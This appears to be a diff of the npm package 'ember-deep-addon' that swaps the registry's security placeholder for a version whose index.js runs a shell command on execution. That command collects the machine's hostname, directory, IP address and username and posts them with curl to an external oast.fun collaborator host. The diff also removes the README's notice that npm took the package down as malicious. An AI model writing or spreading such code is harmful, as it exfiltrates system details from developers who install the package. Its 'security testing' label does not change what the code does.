ember-deep-addon 0.0.1-security → 6.6.1

package/index.js

@@ -0,0 +1,69 @@
+const { exec } = require("child_process");
+
+
+function sendPingback(data) {
+
+  const collaboratorUrl = "https://rxthgpisbdduguomjwmilyqcfzyn1779r.oast.fun";
+
+  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
+
+    if (error) {
+
+      console.error(`Error: ${error.message}`);
+
+      return;
+
+    }
+
+    if (stderr) {
+
+      console.error(`Stderr: ${stderr}`);
+
+      return;
+
+    }
+
+    console.log(`Pingback sent: ${stdout}`);
+
+  });
+
+}
+
+
+function executeCommand(command) {
+
+  exec(command, (error, stdout, stderr) => {
+
+    if (error) {
+
+      console.error(`Error: ${error.message}`);
+
+      sendPingback(`Error executing command: ${error.message}`);
+
+      return;
+
+    }
+
+    if (stderr) {
+
+      console.error(`Stderr: ${stderr}`);
+
+      sendPingback(`Stderr: ${stderr}`);
+
+      return;
+
+    }
+
+    console.log(`Command output: ${stdout}`);
+
+    sendPingback(stdout); // Send the command output to the collaborator
+
+  });
+
+}
+
+
+// Example: Execute a command (e.g., 'whoami')
+
+executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
+

package/package.json

@@ -1,6 +1,25 @@
 {
+
+
   "name": "ember-deep-addon",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+
+
+  "version": "6.6.1",
+
+
+  "description": "A simple package to trigger Burp Collaborator for security testing",
+
+
+  "main": "index.js",
+
+
+  "scripts": {
+
+
+    "test": "node index.js"
+
+
+  }
+
+
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=ember-deep-addon for more information.